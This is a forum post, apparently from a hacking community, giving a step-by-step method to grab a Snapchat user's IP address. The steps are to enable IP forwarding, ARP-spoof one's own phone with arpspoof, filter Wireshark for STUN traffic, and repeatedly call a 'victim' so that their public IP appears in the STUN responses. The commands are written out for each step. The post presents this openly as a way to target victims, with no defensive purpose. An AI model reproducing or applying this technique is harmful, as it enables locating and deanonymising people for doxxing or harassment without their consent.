• 🌙 Community Spirit

    Ramadan Mubarak! To honor this month, Crax has paused NSFW categories. Wishing you peace and growth!

SnapChat IP Grabbing 2021 (1 Viewer)

Currently reading:
 SnapChat IP Grabbing 2021 (1 Viewer)

Recently searched:

The1337Wolf

Member
Amateur
LV
4
Joined
Dec 13, 2020
Threads
112
Likes
500
Awards
11
Credits
10,586©
Cash
2$
Hey guys, I am glad to bring this method to you:

Download Wireshark Here
Download arpspoof Here - MACOS only* - Kali linux has this already!

1. Fire up terminal and ip forward your laptop/pc with this scripts:
Kali - "" sudo sysctl net.ipv4.ip_forward = 1 ""
"" sudo net.ipv4.ip_forward = 1 ""

Mac - "" sudo sysctl -w net.inet.ip.forwarding=1 ""

2. Find your phone device local ip and write it down.
Nmap -sn <gateway ip>/24 ex. nmap -sn (or -sP) 192.168.0.1/24

3. Spoof your phone.

arpspoof -i <interface> -t <phone ip> gateway

ex(mac): arpspoof -i en0 -t 192.168.0.160 192.168.0.1


4. Fire up Wireshark and filter on your phone ip with STUN protocol

ip.addr == <phone ip> && stun

ex. ip.addr == 192.168.0.160 && stun


5. Call your victim on snap and keep calling him for around 5 seconds.
THEY DO NOT NEED NECESSARY TO ANSWER
You will see on wireshark there are some binding requests, then some other STUN ones.
Those last ones are your victim's ip.
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Recently searched:

Similar threads

Users who are viewing this thread

Top Bottom